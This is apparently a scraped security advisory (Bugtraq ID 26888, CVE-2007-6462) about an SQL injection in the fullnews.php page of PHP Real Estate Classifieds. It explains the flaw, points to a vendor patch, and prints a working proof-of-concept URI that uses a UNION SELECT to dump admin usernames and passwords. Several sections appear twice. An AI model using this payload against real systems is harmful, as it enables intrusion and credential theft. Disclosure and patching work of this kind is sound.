PHP Real Estate Classifieds 'fullnews.php' SQL Injection Vulnerability
BID:26888
Info
PHP Real Estate Classifieds 'fullnews.php' SQL Injection Vulnerability
| Bugtraq ID: | 26888 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6462 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 14 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | t0pP8uZz discovered this vulnerability. |
| Vulnerable: |
PHP Real Estate Classifieds PHP Real Estate Classifieds Premium Plus 0 |
| Not Vulnerable: | |
Discussion
PHP Real Estate Classifieds 'fullnews.php' SQL Injection Vulnerability
PHP Real Estate Classifieds is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
PHP Real Estate Classifieds is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
PHP Real Estate Classifieds 'fullnews.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*
Solution / Fix
PHP Real Estate Classifieds 'fullnews.php' SQL Injection Vulnerability
Solution:
The vendor released an advisory and updates to address the issue. Please see the references for more information.
PHP Real Estate Classifieds PHP Real Estate Classifieds Premium Plus 0
Solution:
The vendor released an advisory and updates to address the issue. Please see the references for more information.
PHP Real Estate Classifieds PHP Real Estate Classifieds Premium Plus 0
-
PHP Real Estate Classifieds PHPREC-12160712587-PATCH.zip
http://phprealestatescript.com/PHPREC-12160712587-PATCH.zip
References
PHP Real Estate Classifieds 'fullnews.php' SQL Injection Vulnerability
References:
References:
- PHP Real Estate Classifieds Homepage (PHP Real Estate Classifieds)